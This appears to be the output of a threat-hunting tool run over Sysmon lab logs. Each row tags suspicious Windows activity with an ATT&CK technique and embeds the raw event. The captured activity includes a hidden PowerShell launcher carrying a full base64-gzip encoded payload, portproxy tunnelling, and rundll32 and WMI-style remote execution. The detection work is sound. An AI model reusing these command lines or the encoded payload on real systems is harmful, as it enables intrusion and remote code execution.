IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 9809 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-30 20:26:52.356 + 365ABB72-AF8C-5CC8-0000-001003361900 + 2484 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + "powershell.exe" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-2586-5CC9-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AF8B-5CC8-0000-0010AC1B1900 + 3872 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.683059,2019-07-30T01:33:58.683059+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4949 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.357 + 747F3D96-6646-5D3F-0000-0010A7398B00 + 3868 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,Low,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\mshta.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.16 ) to hostname ( ) , IP ( 10.0.2.17 ) and port ( 55683 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 17590 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:00.318 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + false + false + 10.0.2.16 + IEWIN7 + 49168 + + false + 10.0.2.17 + + 55683 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.822098,2020-10-18T02:53:05.822098+04:00,,Threat,High,"Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 421227 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 22:53:05.776 + 747F3D96-75D1-5F8B-0000-001088C23300 + 2784 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /Q /c c:\windows\system32\rundll32.exe c:\programdata\7okjer,#1 1> \\127.0.0.1\C$\WqEVwJZYOe 2>&1 + C:\ + MSEDGEWIN10\Administrator + 747F3D96-75D0-5F8B-0000-0020A8A83300 + 0x33a8a8 + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-75D1-5F8B-0000-00101DAB3300 + 2228 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\sqlsvc) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 56509 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-11-03 13:51:56.380 + 747F3D96-DB7C-5DBE-0000-0010CF6B9502 + 5004 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c set > c:\users\\public\netstat.txt + C:\Windows\system32\ + MSEDGEWIN10\sqlsvc + 747F3D96-CE3B-5DBE-0000-00201ED50100 + 0x1d51e + 0 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-CE42-5DBE-0000-0010EE430200 + 3936 + C:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe + "c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1608044416.699632,2020-12-15T19:00:16.699632+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10 and IP ( 10.0.2.15 ) to hostname ( MSEDGEWIN10CLONE ) , IP ( 10.0.2.17 ) and port ( 49666 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 589975 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-12-15 15:00:14.470 + 747F3D96-CF4B-5FD8-0000-00101AD58700 + 6976 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + tcp + true + false + 10.0.2.15 + MSEDGEWIN10 + 50008 + + false + 10.0.2.17 + MSEDGEWIN10CLONE + 49666 + + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436038.598592,2019-07-30T01:33:58.598592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4948 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:58.355 + 747F3D96-6646-5D3F-0000-001029398B00 + 6760 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( C:\Windows\System32\mshta.exe -Embedding ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1557797345.534521,2019-05-14T05:29:05.534521+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (C:\Windows\System32\mshta.exe -Embedding) and Parent Image :C:\Windows\System32\svchost.exe , Parent CommandLine (C:\Windows\system32\svchost.exe -k DcomLaunch) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17589 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-14 01:29:04.293 + 365ABB72-19E0-5CDA-0000-001006711000 + 1932 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + C:\Windows\System32\mshta.exe -Embedding + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-19E0-5CDA-0000-0020CE701000 + 0x1070ce + 0 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-965E-5CDA-0000-0010AF760000 + 596 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k DcomLaunch + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1618950780.296686,2021-04-21T00:33:00.296686+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 578497 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2021-04-20 20:32:55.351 + 747F3D96-3A77-607F-0000-00105DD17600 + 7280 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-0433-607F-0000-002073600700 + 0x76073 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-04C3-607F-0000-0010F13B1E00 + 2532 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.4512,2020-03-21T09:00:25.451200+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243556 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.441 + 747F3D96-9F69-5E75-0000-00102F962000 + 6136 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 